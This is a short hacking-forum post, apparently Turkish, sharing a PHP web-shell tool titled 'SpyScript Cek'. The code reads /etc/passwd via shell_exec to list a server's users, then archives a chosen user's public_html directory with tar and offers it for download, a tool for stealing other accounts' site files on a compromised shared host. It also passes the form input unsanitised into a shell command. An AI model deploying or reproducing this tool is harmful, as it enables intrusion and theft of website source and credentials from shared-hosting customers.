Script Çekici Shell (Backup) (1 Viewer)

Kirito1337

B0RU70
Joined
Feb 27, 2017
Credits
0
Rating - 0%
PHP:
<center>
<title>SpyScript Cek</title>
<form method="post" action="">
<?php $passwd=shell_exec("cat /etc/passwd"); echo "<textarea cols='85' rows='17'>"; echo $passwd."\n"; echo "</textarea>"; ?>
<br>Hedef Username (ex:shellerim) : <br><input type="text" name="user"><br>
<input type="submit" name="submit" value="&#199;ek"><br>
<b>2DCoders</b>
</form>
</center>
<?php ob_start(); set_time_limit(0); class ceker{ public function script($hedef){ $phpself=dirname(__FILE__); $cek=shell_exec("cd /home/".$hedef."/public_html/;tar cvzf ".$phpself."/".$hedef.".tar.gz *"); echo "<center><a href='".$hedef.".tar.gz'>".$hedef.".tar.gz</a></center>"; ob_flush(); flush(); } } if(isset($_POST['submit'])){ $ceker=new ceker(); $ceker->script($_POST['user']); } ?>
 

Users who are viewing this thread

Top